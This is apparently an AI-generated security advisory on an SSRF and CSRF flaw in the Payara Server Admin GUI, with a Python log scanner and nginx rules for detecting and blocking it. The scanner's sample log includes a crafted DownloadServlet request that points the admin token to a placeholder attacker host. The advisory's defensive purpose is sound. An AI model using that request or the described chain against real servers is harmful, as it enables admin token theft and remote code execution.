CVE-2026-12986 Overview
CVE-2026-12986 is a Server-Side Request Forgery (SSRF) vulnerability in the DownloadServlet of the Payara Server Admin GUI. The flaw is compounded by missing Cross-Site Request Forgery (CSRF) protection [CWE-352], allowing an unauthenticated attacker to trick a logged-in administrator into leaking the REST session token (gfresttoken) to an attacker-controlled host. Once captured, the token grants full administrative access to the Payara domain and enables arbitrary code execution through WAR file deployment. The vulnerability affects Payara Server Full versions 4.x, 5.x, 6.x, 7.x, 7.2026.x, 6.2025.x, and 6.2024.x across all platforms.
Critical Impact
An unauthenticated attacker can achieve full takeover of the Payara admin domain and execute arbitrary code by deploying a malicious WAR file after stealing the administrator's gfresttoken.
Affected Products
- Payara Server Full 4.x, 5.x, 6.x, and 7.x branches
- Payara Server Full 7.2026.x, 6.2025.x, and 6.2024.x release trains
- The admingui:console-common module containing DownloadServlet and ContentSource implementations (LogViewerContentSource, LogFilesContentSource, LBConfigContentSource, ClientStubsContentSource)
Discovery Timeline
- 2026-06-24 - CVE-2026-12986 published to NVD
- 2026-06-25 - Last updated in NVD database
Technical Details for CVE-2026-12986
Vulnerability Analysis
The vulnerability chains two distinct weaknesses in the Payara Admin GUI. First, the DownloadServlet accepts user-controlled URL parameters and fetches the referenced resource itself, server-side, without validating the destination host. Second, the same servlet lacks CSRF protection, so any cross-origin request arriving from an authenticated administrator's browser is honored.
When the SSRF primitive is invoked, the servlet forwards request data, including the administrator's gfresttoken, to the attacker-supplied host. The attacker then replays this token against the Payara REST management interface to execute privileged operations. Arbitrary code execution follows by deploying a malicious WAR file through the standard administrative deployment endpoint.
Root Cause
The root cause is twofold. The DownloadServlet and its associated ContentSource implementations dereference attacker-influenced URLs without restricting the target to trusted internal endpoints. In parallel, the servlet does not enforce CSRF tokens or Origin/Referer validation, violating the protection expected for state-changing administrative endpoints [CWE-352].
Attack Vector
Exploitation requires an authenticated Payara administrator to visit an attacker-controlled web page or click a crafted link while logged into the Admin GUI. The page issues a forged request to the vulnerable DownloadServlet endpoint, triggering the server to perform an outbound request that carries the administrator's session token to the attacker's listener. With the captured gfresttoken, the attacker authenticates to the REST API and deploys an arbitrary WAR file, gaining code execution under the Payara process context. Technical specifics are documented in the Payara Release Notes 7.2026.6.
Detection Methods for CVE-2026-12986
Indicators of Compromise
- Outbound HTTP/HTTPS requests originating from the Payara JVM process to unexpected external hosts, particularly from DownloadServlet request handling
- Admin GUI access logs showing requests to DownloadServlet with external URLs in query parameters
- WAR deployments via the REST management interface (/management/domain/applications) from administrator sessions that did not originate from the Admin GUI console
- New or unexpected applications appearing in the Payara domain configuration
Detection Strategies
- Inspect Payara server.log and HTTP access logs for DownloadServlet requests containing non-local URLs in parameters
- Correlate administrator login events with subsequent REST API deployments to identify token replay from unfamiliar source IPs
- Monitor egress traffic from application servers to detect SSRF callbacks to untrusted destinations
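One way to run the first detection strategy over access logs, as an added example that is not Payara code: it parses constructed log lines laid out like the default Payara/GlassFish access-log format and flags DownloadServlet requests whose query parameters carry a URL pointing anywhere other than loopback, including percent-encoded and double-encoded forms. The /download/ path prefix is an assumption; confirm the servlet mapping in the console-common web.xml of your build.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Added example, not Payara code. Field layout follows the default Payara/GlassFish
# access-log format: quoted client IP, auth user, datetime, request line, status, length.
ACCESS_LINE = re.compile(
    r'^"(?P<client>[^"]*)" "(?P<user>[^"]*)" "(?P<time>[^"]*)" '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<length>\S+)'
)
DOWNLOAD_PREFIX = "/download/"   # assumption: verify the DownloadServlet mapping in web.xml
LOOPBACK = {"localhost", "127.0.0.1", "::1"}
ABSOLUTE_URL = re.compile(r"^(?:[a-z][a-z0-9+.\-]*:)?//", re.I)   # scheme://host or //host


def external_urls(target: str) -> list[str]:
    """Return query-parameter values that are URLs pointing off the loopback host."""
    found = []
    for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote(value)            # second decode catches https%253A%252F%252F...
        if not ABSOLUTE_URL.match(value):
            continue
        host = urlsplit(value).hostname
        if host and host not in LOOPBACK:
            found.append(value)
    return found


def scan(lines):
    """Return (client, target, urls) for DownloadServlet requests carrying external URLs."""
    hits = []
    for line in lines:
        m = ACCESS_LINE.match(line)
        if m and m["target"].startswith(DOWNLOAD_PREFIX):
            urls = external_urls(m["target"])
            if urls:
                hits.append((m["client"], m["target"], urls))
    return hits


# Constructed sample lines (not real traffic); attacker.example is a placeholder host.
SAMPLE_LOG = [
    '"10.1.2.3" "admin" "24/Jun/2026:10:00:01 +0000" "GET /management/domain/applications HTTP/1.1" 200 512',
    '"10.1.2.3" "admin" "24/Jun/2026:10:00:05 +0000" "GET /download/log?file=server.log HTTP/1.1" 200 20480',
    '"10.1.2.3" "admin" "24/Jun/2026:10:00:09 +0000" "GET /download/log?url=https%3A%2F%2Fattacker.example%2Fc HTTP/1.1" 302 0',
    '"10.1.2.3" "admin" "24/Jun/2026:10:00:12 +0000" "GET /download/stubs?src=http://127.0.0.1:4848/local HTTP/1.1" 200 99',
]

if __name__ == "__main__":
    for client, target, urls in scan(SAMPLE_LOG):
        print(f"SSRF-shaped DownloadServlet request from {client}: {target} -> {urls}")
```

Loopback-only is a deliberately strict allowlist; widen LOOPBACK to the internal hosts the servlet legitimately fetches from once you have confirmed them.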
Monitoring Recommendations
- Alert on any WAR or EAR deployment performed through the REST API outside of approved change windows
- Track usage of the gfresttoken cookie across distinct client IP addresses within short time windows, which indicates token replay
- Enable verbose audit logging on the admingui:console-common module and forward logs to a centralized SIEM for correlation
How to Mitigate CVE-2026-12986
Immediate Actions Required
- Upgrade Payara Server to the patched release line referenced in the Payara Release Notes 7.2026.6
- Restrict the Admin GUI listener (default port 4848) to trusted management networks only, never exposing it to the internet or general user VLANs
- Invalidate existing administrator sessions and rotate gfresttoken values after patching
- Audit recently deployed applications and remove any WAR files not authorized by the operations team
Patch Information
Payara has addressed the vulnerability in the 7.2026.6 release. Refer to the Payara Release Notes 7.2026.6 for upgrade instructions and the corresponding fixed builds for the 4.x, 5.x, 6.x, and 7.x branches. The fix tightens URL validation in DownloadServlet and adds CSRF protection to the affected ContentSource endpoints.
Workarounds
- Bind the Admin GUI to localhost only and require administrators to access it through an authenticated bastion or VPN
- Place a reverse proxy in front of the Admin GUI that blocks requests to DownloadServlet paths containing absolute external URLs
- Require administrators to use isolated browser profiles for Payara management to reduce CSRF exposure from arbitrary web browsing
- Apply egress filtering on the Payara server to deny outbound HTTP/HTTPS to non-allowlisted destinations
Configuration example: restrict the admin listener to loopback in domain.xml. Edit <PAYARA_HOME>/glassfish/domains/domain1/config/domain.xml and set the address attribute of the admin-listener network-listener to 127.0.0.1:

<!-- admin-listener bound to loopback only -->
<network-listener port="4848" protocol="admin-listener" transport="tcp"
                  name="admin-listener" thread-pool="admin-thread-pool"
                  address="127.0.0.1"/>
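A reverse-proxy configuration for the workaround above, as an added example that is not Payara's own configuration. It assumes nginx, that DownloadServlet is mapped under /download/ (placeholder; confirm in the console-common web.xml of your build), a placeholder hostname and certificate paths, and that the admin listener is bound to loopback as in the domain.xml snippet. It goes slightly beyond the workaround by also refusing requests the browser itself labels cross-site, which covers the CSRF half of the chain.

```nginx
# Added example: nginx in front of the Payara Admin GUI (not Payara's own config).
# Assumptions: DownloadServlet mapped under /download/ (placeholder, verify in
# console-common web.xml); console reached as https://payara-admin.internal.

# 1 if any query parameter value is an absolute or protocol-relative URL,
# in plain or single percent-encoded form (https://, https%3A%2F%2F, //).
# Double-encoded values are not caught here; keep the log-side check as well.
map $args $download_has_url {
    default 0;
    "~*(^|[&=])(https?(:|%3A)(//|%2F%2F)|//|%2F%2F)" 1;
}

# 1 when the browser reports the request as cross-site (CSRF-shaped traffic).
map $http_sec_fetch_site $cross_site {
    default 0;
    "cross-site" 1;
}

server {
    listen 443 ssl;
    server_name payara-admin.internal;             # placeholder
    ssl_certificate     /etc/nginx/tls/admin.crt;  # placeholder paths
    ssl_certificate_key /etc/nginx/tls/admin.key;

    # Workaround from the advisory: refuse DownloadServlet requests that carry
    # an external URL, and refuse cross-site requests to it outright.
    location /download/ {
        if ($download_has_url) { return 403; }
        if ($cross_site)       { return 403; }
        proxy_pass http://127.0.0.1:4848;          # use https:// if secure admin is enabled
        proxy_set_header Host $host;
    }

    location / {
        proxy_pass http://127.0.0.1:4848;
        proxy_set_header Host $host;
    }
}
```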
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.